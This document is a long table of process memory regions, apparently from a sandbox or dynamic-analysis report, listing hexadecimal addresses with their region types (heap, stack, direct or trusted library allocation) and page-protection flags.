CA83D75000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
C0000A2000
|
direct allocation
|
page read and write
|
||
|
1E803228000
|
heap
|
page read and write
|
||
|
1F8C03D8000
|
heap
|
page read and write
|
||
|
1F8C0267000
|
heap
|
page read and write
|
||
|
D94A97D000
|
stack
|
page read and write
|
||
|
AE10FFE000
|
unkown
|
page readonly
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF849002000
|
trusted library allocation
|
page read and write
|
||
|
25D70130000
|
heap
|
page read and write
|
||
|
AE108FC000
|
stack
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
28E2BD15000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
13FBB8B4000
|
heap
|
page read and write
|
||
|
1F8C0205000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
1F8BF650000
|
trusted library allocation
|
page read and write
|
||
|
2349BCD5000
|
trusted library allocation
|
page read and write
|
||
|
16486EA0000
|
heap
|
page read and write
|
||
|
26257420000
|
direct allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
13FA1700000
|
heap
|
page read and write
|
||
|
1F8C0258000
|
heap
|
page read and write
|
||
|
2349BD12000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F0BD92C000
|
heap
|
page read and write
|
||
|
B88A9FE000
|
stack
|
page read and write
|
||
|
13FB37D6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
|
25D00229000
|
trusted library allocation
|
page read and write
|
||
|
C000086000
|
direct allocation
|
page read and write
|
||
|
1913DCE0000
|
heap
|
page read and write
|
||
|
1B213105000
|
heap
|
page read and write
|
||
|
13FBBBAB000
|
heap
|
page read and write
|
||
|
25D01960000
|
trusted library allocation
|
page read and write
|
||
|
C000055000
|
direct allocation
|
page read and write
|
||
|
7FF848E7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
13FBBA00000
|
heap
|
page execute and read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
23DBB2A5000
|
heap
|
page read and write
|
||
|
1EE5934A000
|
trusted library allocation
|
page read and write
|
||
|
D94B94E000
|
stack
|
page read and write
|
||
|
1F8C0225000
|
heap
|
page read and write
|
||
|
1EE58ED7000
|
trusted library allocation
|
page read and write
|
||
|
231D6380000
|
heap
|
page read and write
|
||
|
1EE58EB5000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2349C149000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2BB8585D000
|
trusted library allocation
|
page read and write
|
||
|
C00007E000
|
direct allocation
|
page read and write
|
||
|
FCA000
|
unkown
|
page readonly
|
||
|
262571C0000
|
direct allocation
|
page read and write
|
||
|
2BB851F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
234B3DC0000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
FE5757F000
|
stack
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
DFF000
|
unkown
|
page readonly
|
||
|
2466BE45000
|
heap
|
page read and write
|
||
|
2349C082000
|
trusted library allocation
|
page read and write
|
||
|
7FF849270000
|
trusted library allocation
|
page read and write
|
||
|
26B8FB10000
|
heap
|
page read and write
|
||
|
220FB425000
|
heap
|
page read and write
|
||
|
E77AFB6000
|
stack
|
page read and write
|
||
|
C0000C0000
|
direct allocation
|
page read and write
|
||
|
1F8C0258000
|
heap
|
page read and write
|
||
|
1F8C0261000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
26B90202000
|
trusted library allocation
|
page read and write
|
||
|
C00006E000
|
direct allocation
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
22F3FFB7000
|
heap
|
page read and write
|
||
|
23499CF0000
|
heap
|
page read and write
|
||
|
E77ACFD000
|
stack
|
page read and write
|
||
|
25D72588000
|
heap
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
1F8C024F000
|
heap
|
page read and write
|
||
|
1F8C0258000
|
heap
|
page read and write
|
||
|
13FA31E0000
|
trusted library allocation
|
page read and write
|
||
|
2F250FF000
|
stack
|
page read and write
|
||
|
25D0103F000
|
trusted library allocation
|
page read and write
|
||
|
25D720EE000
|
heap
|
page read and write
|
||
|
1EE58F0A000
|
trusted library allocation
|
page read and write
|
||
|
23263F60000
|
trusted library allocation
|
page read and write
|
||
|
23DBB050000
|
heap
|
page read and write
|
||
|
1EE7133A000
|
heap
|
page read and write
|
||
|
2349B964000
|
heap
|
page read and write
|
||
|
1D548940000
|
heap
|
page read and write
|
||
|
13FA3751000
|
trusted library allocation
|
page read and write
|
||
|
2BB8AA15000
|
trusted library allocation
|
page read and write
|
||
|
1F8C5879000
|
trusted library allocation
|
page read and write
|
||
|
25D70257000
|
heap
|
page read and write
|
||
|
23499EE0000
|
heap
|
page read and write
|
||
|
25D01DE7000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
|
26B8FD02000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
E0550FE000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
1F8BF6A8000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0957000
|
trusted library allocation
|
page read and write
|
||
|
25D72390000
|
heap
|
page read and write
|
||
|
262572D9000
|
direct allocation
|
page read and write
|
||
|
C0002AC000
|
direct allocation
|
page read and write
|
||
|
1F0BD93C000
|
heap
|
page read and write
|
||
|
C2073E000
|
stack
|
page read and write
|
||
|
2BB838E0000
|
heap
|
page read and write
|
||
|
1F0BD92E000
|
heap
|
page read and write
|
||
|
C0000B8000
|
direct allocation
|
page read and write
|
||
|
25D720CD000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
2325F1D1000
|
trusted library allocation
|
page read and write
|
||
|
C00013E000
|
direct allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F0BD93C000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F0BD804000
|
trusted library allocation
|
page read and write
|
||
|
D63000
|
unkown
|
page readonly
|
||
|
23264000000
|
trusted library allocation
|
page read and write
|
||
|
2325EB29000
|
heap
|
page read and write
|
||
|
2349B8D0000
|
heap
|
page read and write
|
||
|
2325FB50000
|
trusted library section
|
page readonly
|
||
|
25D00DEE000
|
trusted library allocation
|
page read and write
|
||
|
1F8BF630000
|
trusted library allocation
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
25D70455000
|
heap
|
page read and write
|
||
|
C000166000
|
direct allocation
|
page read and write
|
||
|
C0000A6000
|
direct allocation
|
page read and write
|
||
|
1F8C023D000
|
heap
|
page read and write
|
||
|
C0002A2000
|
direct allocation
|
page read and write
|
||
|
1F0BD936000
|
heap
|
page read and write
|
||
|
23DBAFB0000
|
heap
|
page read and write
|
||
|
7FF848FBA000
|
trusted library allocation
|
page read and write
|
||
|
2325F302000
|
heap
|
page read and write
|
||
|
25D71AF0000
|
trusted library allocation
|
page read and write
|
||
|
E0553FE000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0970000
|
heap
|
page readonly
|
||
|
E77B2BB000
|
stack
|
page read and write
|
||
|
26B8FA10000
|
heap
|
page read and write
|
||
|
20FEB330000
|
heap
|
page read and write
|
||
|
7FF848FD1000
|
trusted library allocation
|
page read and write
|
||
|
23264080000
|
trusted library allocation
|
page read and write
|
||
|
25D72370000
|
heap
|
page read and write
|
||
|
26B8FA30000
|
heap
|
page read and write
|
||
|
1F0BD925000
|
heap
|
page read and write
|
||
|
C207BE000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2325EAAF000
|
heap
|
page read and write
|
||
|
C00011A000
|
direct allocation
|
page read and write
|
||
|
B8D4AFB000
|
stack
|
page read and write
|
||
|
FE572BF000
|
stack
|
page read and write
|
||
|
1F8C03B1000
|
heap
|
page read and write
|
||
|
1F8C03AA000
|
heap
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C0402000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
23499D2E000
|
heap
|
page read and write
|
||
|
234B40A0000
|
heap
|
page read and write
|
||
|
23499F20000
|
trusted library allocation
|
page read and write
|
||
|
1F8BF6A8000
|
trusted library allocation
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F7ABE2F000
|
heap
|
page read and write
|
||
|
25D725D9000
|
heap
|
page read and write
|
||
|
E77B0BA000
|
stack
|
page read and write
|
||
|
1F8C03C2000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
13FBBC18000
|
heap
|
page read and write
|
||
|
C204F7000
|
stack
|
page read and write
|
||
|
E6C000
|
unkown
|
page readonly
|
||
|
AE102F7000
|
stack
|
page read and write
|
||
|
23264200000
|
heap
|
page read and write
|
||
|
161037C0000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1EE58F47000
|
trusted library allocation
|
page read and write
|
||
|
1F8C026D000
|
heap
|
page read and write
|
||
|
1D548BE5000
|
heap
|
page read and write
|
||
|
1EE58FE4000
|
trusted library allocation
|
page read and write
|
||
|
262571D0000
|
heap
|
page read and write
|
||
|
5736A7D000
|
stack
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F0BD8D4000
|
heap
|
page read and write
|
||
|
E77AEF9000
|
stack
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
1F8C0288000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C000172000
|
direct allocation
|
page read and write
|
||
|
2BB83A1E000
|
heap
|
page read and write
|
||
|
139A000
|
unkown
|
page readonly
|
||
|
23499FD0000
|
trusted library allocation
|
page read and write
|
||
|
25D10163000
|
trusted library allocation
|
page read and write
|
||
|
232642C6000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
2349BDC9000
|
trusted library allocation
|
page read and write
|
||
|
E0560CC000
|
stack
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
C66B67F000
|
stack
|
page read and write
|
||
|
C000120000
|
direct allocation
|
page read and write
|
||
|
1E857A00000
|
heap
|
page read and write
|
||
|
16103A20000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
2BB8A015000
|
trusted library allocation
|
page read and write
|
||
|
C000038000
|
direct allocation
|
page read and write
|
||
|
1F8C024F000
|
heap
|
page read and write
|
||
|
C00012A000
|
direct allocation
|
page read and write
|
||
|
1F8C5C80000
|
heap
|
page read and write
|
||
|
E77AC7F000
|
stack
|
page read and write
|
||
|
2325FB80000
|
trusted library section
|
page readonly
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
F4D000
|
unkown
|
page readonly
|
||
|
1F0BD93C000
|
heap
|
page read and write
|
||
|
AE115FE000
|
unkown
|
page readonly
|
||
|
1B213080000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
13FA3981000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03C4000
|
heap
|
page read and write
|
||
|
2338BFFB000
|
heap
|
page read and write
|
||
|
25D00F73000
|
trusted library allocation
|
page read and write
|
||
|
25D725B4000
|
heap
|
page read and write
|
||
|
1F8C03C4000
|
heap
|
page read and write
|
||
|
25D70150000
|
heap
|
page read and write
|
||
|
63469CD000
|
stack
|
page read and write
|
||
|
C0002BC000
|
direct allocation
|
page read and write
|
||
|
23499DEB000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C0002A0000
|
direct allocation
|
page read and write
|
||
|
1F8C59E0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0245000
|
heap
|
page read and write
|
||
|
7DF43B570000
|
trusted library allocation
|
page execute and read and write
|
||
|
23DBB03E000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1E803100000
|
heap
|
page read and write
|
||
|
1B213090000
|
heap
|
page read and write
|
||
|
1F8C5835000
|
trusted library allocation
|
page read and write
|
||
|
25D701B0000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
13FA3C2F000
|
trusted library allocation
|
page read and write
|
||
|
25D0131C000
|
trusted library allocation
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
13FBB863000
|
heap
|
page read and write
|
||
|
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
|
1913DD58000
|
heap
|
page read and write
|
||
|
13FA1810000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C0398000
|
heap
|
page read and write
|
||
|
23263FA0000
|
trusted library allocation
|
page read and write
|
||
|
860000
|
unkown
|
page readonly
|
||
|
2BB8397C000
|
heap
|
page read and write
|
||
|
26B8FC00000
|
heap
|
page read and write
|
||
|
7FF84920C000
|
trusted library allocation
|
page read and write
|
||
|
1E804B10000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
13FBB93F000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0241000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
C000146000
|
direct allocation
|
page read and write
|
||
|
F18000
|
unkown
|
page readonly
|
||
|
25D72488000
|
heap
|
page read and write
|
||
|
1F8C0750000
|
heap
|
page read and write
|
||
|
1F8C03D2000
|
heap
|
page read and write
|
||
|
1F8C5900000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0244000
|
heap
|
page read and write
|
||
|
E0562CC000
|
stack
|
page read and write
|
||
|
25D71B30000
|
heap
|
page readonly
|
||
|
1001FE000
|
unkown
|
page read and write
|
||
|
2BB85265000
|
heap
|
page read and write
|
||
|
1F8C03AC000
|
heap
|
page read and write
|
||
|
20FEB3C5000
|
heap
|
page read and write
|
||
|
1F8C0416000
|
heap
|
page read and write
|
||
|
7DF4D2620000
|
trusted library allocation
|
page execute and read and write
|
||
|
23264070000
|
trusted library allocation
|
page read and write
|
||
|
AE114FE000
|
unkown
|
page readonly
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
23499FE0000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
2349C8B2000
|
trusted library allocation
|
page read and write
|
||
|
2349BDCF000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0268000
|
heap
|
page read and write
|
||
|
25D722A0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0959000
|
trusted library allocation
|
page read and write
|
||
|
220FB460000
|
heap
|
page read and write
|
||
|
AE11FFE000
|
unkown
|
page readonly
|
||
|
E0555FE000
|
stack
|
page read and write
|
||
|
26B8FC13000
|
heap
|
page read and write
|
||
|
1F8C03A1000
|
heap
|
page read and write
|
||
|
1EE58EDD000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0239000
|
heap
|
page read and write
|
||
|
13FA3740000
|
heap
|
page execute and read and write
|
||
|
199CC0E1000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1E8031A0000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2338BFF0000
|
heap
|
page read and write
|
||
|
2349BDCC000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD840000
|
heap
|
page read and write
|
||
|
13FBB8BF000
|
heap
|
page read and write
|
||
|
2338BF70000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
19A2D141000
|
heap
|
page read and write
|
||
|
AE1147E000
|
stack
|
page read and write
|
||
|
2338BF40000
|
heap
|
page read and write
|
||
|
AE10D7E000
|
stack
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C0269000
|
heap
|
page read and write
|
||
|
C000180000
|
direct allocation
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C5AC9000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD90C000
|
heap
|
page read and write
|
||
|
E054EFE000
|
stack
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
2326430A000
|
heap
|
page read and write
|
||
|
1F8C5AC5000
|
trusted library allocation
|
page read and write
|
||
|
26B8FC02000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C200FE000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2326423F000
|
heap
|
page read and write
|
||
|
E05547E000
|
stack
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
25D018CE000
|
trusted library allocation
|
page read and write
|
||
|
1EE57595000
|
heap
|
page read and write
|
||
|
25D71B10000
|
trusted library section
|
page read and write
|
||
|
C000008000
|
direct allocation
|
page read and write
|
||
|
2326430C000
|
heap
|
page read and write
|
||
|
1F8C0371000
|
heap
|
page read and write
|
||
|
C000088000
|
direct allocation
|
page read and write
|
||
|
D94B9CD000
|
stack
|
page read and write
|
||
|
1F0BD90C000
|
heap
|
page read and write
|
||
|
1F8C077E000
|
heap
|
page read and write
|
||
|
1E804F50000
|
heap
|
page read and write
|
||
|
1F8C5960000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
13FBBB10000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
C0000C4000
|
direct allocation
|
page read and write
|
||
|
AB207E000
|
stack
|
page read and write
|
||
|
1F8C0267000
|
heap
|
page read and write
|
||
|
2349BCB1000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
AB22FC000
|
stack
|
page read and write
|
||
|
2325FB90000
|
trusted library section
|
page readonly
|
||
|
1F8C0395000
|
heap
|
page read and write
|
||
|
2BB85200000
|
heap
|
page readonly
|
||
|
1EE58F6A000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0258000
|
heap
|
page read and write
|
||
|
23263F74000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
AE119FE000
|
unkown
|
page readonly
|
||
|
2338BFFD000
|
heap
|
page read and write
|
||
|
65CB5FE000
|
stack
|
page read and write
|
||
|
1F8C03C2000
|
heap
|
page read and write
|
||
|
25D72360000
|
heap
|
page execute and read and write
|
||
|
138A000
|
unkown
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
25D013D6000
|
trusted library allocation
|
page read and write
|
||
|
C0000B4000
|
direct allocation
|
page read and write
|
||
|
361BBDE000
|
stack
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
234B3E08000
|
heap
|
page read and write
|
||
|
13FA3160000
|
heap
|
page readonly
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
1E857800000
|
heap
|
page read and write
|
||
|
C2130E000
|
stack
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
302D67D000
|
stack
|
page read and write
|
||
|
23499FE5000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
C0000BE000
|
direct allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C5920000
|
trusted library allocation
|
page read and write
|
||
|
302D6FF000
|
stack
|
page read and write
|
||
|
AE117FE000
|
unkown
|
page readonly
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
1F8C0261000
|
heap
|
page read and write
|
||
|
FE5737F000
|
stack
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page execute and read and write
|
||
|
9D72D8F000
|
stack
|
page read and write
|
||
|
7FF848FE8000
|
trusted library allocation
|
page read and write
|
||
|
E0562CE000
|
stack
|
page read and write
|
||
|
E77A96F000
|
unkown
|
page read and write
|
||
|
1EE5936B000
|
trusted library allocation
|
page read and write
|
||
|
2325F501000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F4000
|
trusted library allocation
|
page read and write
|
||
|
7FF849280000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF499DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C00003E000
|
direct allocation
|
page read and write
|
||
|
1EE59046000
|
trusted library allocation
|
page read and write
|
||
|
23264300000
|
heap
|
page read and write
|
||
|
220FB400000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
1913DCB0000
|
heap
|
page read and write
|
||
|
7FF849168000
|
trusted library allocation
|
page read and write
|
||
|
53F3EFE000
|
stack
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
2F24D7B000
|
stack
|
page read and write
|
||
|
2BB839A7000
|
heap
|
page read and write
|
||
|
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
|
13FA1905000
|
heap
|
page read and write
|
||
|
1073000
|
unkown
|
page readonly
|
||
|
1073000
|
unkown
|
page readonly
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
C00001A000
|
direct allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2F256FF000
|
stack
|
page read and write
|
||
|
2325FB70000
|
trusted library section
|
page readonly
|
||
|
7DF499DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25D0134F000
|
trusted library allocation
|
page read and write
|
||
|
23264261000
|
heap
|
page read and write
|
||
|
C0000A0000
|
direct allocation
|
page read and write
|
||
|
B88ACFE000
|
stack
|
page read and write
|
||
|
AE1157E000
|
stack
|
page read and write
|
||
|
262572D4000
|
direct allocation
|
page read and write
|
||
|
2325EA2B000
|
heap
|
page read and write
|
||
|
13FA36D0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
C0000C6000
|
direct allocation
|
page read and write
|
||
|
1EE58FD3000
|
trusted library allocation
|
page read and write
|
||
|
25D01036000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
23263F30000
|
trusted library allocation
|
page read and write
|
||
|
25D10011000
|
trusted library allocation
|
page read and write
|
||
|
6DBECCD000
|
stack
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
1D548A20000
|
heap
|
page read and write
|
||
|
25D01070000
|
trusted library allocation
|
page read and write
|
||
|
C000150000
|
direct allocation
|
page read and write
|
||
|
1F8BF6B0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
26257410000
|
direct allocation
|
page read and write
|
||
|
C0002AE000
|
direct allocation
|
page read and write
|
||
|
13FBB8C5000
|
heap
|
page read and write
|
||
|
3C3D10E000
|
stack
|
page read and write
|
||
|
1E857B80000
|
heap
|
page read and write
|
||
|
C0002BA000
|
direct allocation
|
page read and write
|
||
|
13FA1909000
|
heap
|
page read and write
|
||
|
7FF849002000
|
trusted library allocation
|
page read and write
|
||
|
25D00D83000
|
trusted library allocation
|
page read and write
|
||
|
19A1F740000
|
heap
|
page read and write
|
||
|
C00005A000
|
direct allocation
|
page read and write
|
||
|
E0561CE000
|
stack
|
page read and write
|
||
|
2349C1AD000
|
trusted library allocation
|
page read and write
|
||
|
D94A9FE000
|
stack
|
page read and write
|
||
|
2349C995000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C000006000
|
direct allocation
|
page read and write
|
||
|
1F8C0262000
|
heap
|
page read and write
|
||
|
1F8BF810000
|
heap
|
page read and write
|
||
|
1851FA10000
|
heap
|
page read and write
|
||
|
1F8C0285000
|
heap
|
page read and write
|
||
|
1F8C03DB000
|
heap
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
E77B23E000
|
stack
|
page read and write
|
||
|
13FBBA07000
|
heap
|
page execute and read and write
|
||
|
2325FA60000
|
trusted library allocation
|
page read and write
|
||
|
23499D4E000
|
heap
|
page read and write
|
||
|
23263F20000
|
trusted library allocation
|
page read and write
|
||
|
1EE5729D000
|
heap
|
page read and write
|
||
|
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
|
5736AFF000
|
stack
|
page read and write
|
||
|
C000058000
|
direct allocation
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
19A1F340000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F0BF2C0000
|
heap
|
page read and write
|
||
|
23DBAFD0000
|
heap
|
page read and write
|
||
|
2325EA5C000
|
heap
|
page read and write
|
||
|
C0000AE000
|
direct allocation
|
page read and write
|
||
|
E77AF3E000
|
stack
|
page read and write
|
||
|
1F8C5AE0000
|
trusted library allocation
|
page execute
|
||
|
1F0BD8E7000
|
heap
|
page read and write
|
||
|
25D010A5000
|
trusted library allocation
|
page read and write
|
||
|
1EE572E9000
|
heap
|
page read and write
|
||
|
1F8C03C6000
|
heap
|
page read and write
|
||
|
1B2130B0000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1F0BF1E3000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
25D70450000
|
heap
|
page read and write
|
||
|
1F8C0256000
|
heap
|
page read and write
|
||
|
2BB881CD000
|
trusted library allocation
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
1F8C5AC9000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03C8000
|
heap
|
page read and write
|
||
|
AE10BFE000
|
unkown
|
page readonly
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2BB83BC5000
|
heap
|
page read and write
|
||
|
1F0BD922000
|
heap
|
page read and write
|
||
|
1F8C59C0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03AA000
|
heap
|
page read and write
|
||
|
C000162000
|
direct allocation
|
page read and write
|
||
|
C2037E000
|
stack
|
page read and write
|
||
|
28E2B900000
|
heap
|
page read and write
|
||
|
1F8BF6F4000
|
trusted library allocation
|
page read and write
|
||
|
C00006C000
|
direct allocation
|
page read and write
|
||
|
2325EA13000
|
heap
|
page read and write
|
||
|
65CB3FD000
|
stack
|
page read and write
|
||
|
13FA18C9000
|
heap
|
page read and write
|
||
|
232640D0000
|
remote allocation
|
page read and write
|
||
|
2BB85350000
|
heap
|
page execute and read and write
|
||
|
7FF849159000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F0BD8B5000
|
heap
|
page read and write
|
||
|
231D6655000
|
heap
|
page read and write
|
||
|
3C3D18E000
|
stack
|
page read and write
|
||
|
1F8C03C6000
|
heap
|
page read and write
|
||
|
1F8C03C0000
|
heap
|
page read and write
|
||
|
2338C032000
|
heap
|
page read and write
|
||
|
1F0BD820000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD917000
|
heap
|
page read and write
|
||
|
25D10088000
|
trusted library allocation
|
page read and write
|
||
|
23263F30000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03EC000
|
heap
|
page read and write
|
||
|
1F8C03F3000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
25D004C7000
|
trusted library allocation
|
page read and write
|
||
|
25D00F62000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03C8000
|
heap
|
page read and write
|
||
|
AB1D9E000
|
stack
|
page read and write
|
||
|
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849190000
|
trusted library allocation
|
page read and write
|
||
|
1D548A49000
|
heap
|
page read and write
|
||
|
26257430000
|
heap
|
page read and write
|
||
|
13FB37C5000
|
trusted library allocation
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
E77B1BE000
|
stack
|
page read and write
|
||
|
AB237E000
|
stack
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03FC000
|
heap
|
page read and write
|
||
|
